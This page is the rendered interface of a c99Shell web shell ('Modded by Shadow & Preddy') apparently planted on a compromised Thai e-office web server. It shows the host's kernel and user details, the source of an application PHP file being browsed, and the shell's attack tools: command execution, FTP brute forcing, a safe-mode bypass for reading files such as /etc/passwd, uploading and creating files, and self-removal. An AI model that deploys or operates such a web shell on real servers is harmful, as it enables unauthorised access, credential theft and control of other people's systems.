!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 52.23 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSelectDocNoRegisterEdit.php (1.92 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?PHP
include_once "includefile.php";
if($showajax=="1"){

header("content-type: application/x-javascript; charset=TIS-620");
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../link/function.php";
include_once "../link/functionshow.php";
include_once "funct.php";
include_once "../link/keyThai.php";
}

?>
<table width=100% border="0" align="center" cellpadding="0" cellspacing="0"><tr><td>
            <? if($useMainDocNo==""){  $useMainDocNo=$myuseMainDocNo;  } ?>
            <? if($RsID=="1"){ ?>    
                <input name="DocNo" id="DocNo" type="text" maxlength="50" size="25" value="<? $insertDocNo=1;   if($DocNo==""){   if($myDocNo!=""){  echo $myDocNo; }  }else{  if($DocNo!=""){  echo a2th($DocNo); }  } ?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocNo')" style="FONT-SIZE: 15pt;">
            <? }else{?>
                <input name="DocNo" id="DocNo" type="text" maxlength="50" size="25" value="<? echo a2th(ShowEditDocNo($RsID,$DtID,$mydeptId,$DocfCir,$myDocTypeNo,$useMainDocNo)); ?>" disabled onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocNo')" style="FONT-SIZE: 15pt;">
                <input name="DocNo" id="DocNo" type="hidden" value="<? echo a2th(ShowEditDocNo($RsID,$DtID,$mydeptId,$DocfCir,$myDocTypeNo,$useMainDocNo)); ?>">
            <? ?>
            <? if($RsID=="2"){ ?> <input name="useMainDocNo" id="useMainDocNo" type="checkbox" value="Y" onClick="showSelectDocNoRegisterEdit('<? echo $myDocNo?>','<? echo $mydeptId?>','<? echo $myDocTypeNo;?>');" <?  if($useMainDocNo =="Y"){   echo "checked"; } ?>>&nbsp;ãªé·Õè˹ѧÊ×Í&nbsp;<? echo a2th($oSys->sysDocNo); ?> <?  ?>
            <input name="myDocNo" id="myDocNo" type="hidden" value="<? echo $myDocNo?>">
            <input name="mydeptId" id="mydeptId" type="hidden" value="<? echo $mydeptId?>">
            <input name="myDocTypeNo" id="myDocTypeNo" type="hidden" value="<? echo $myDocTypeNo?>">
</td></tr></table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0064 ]--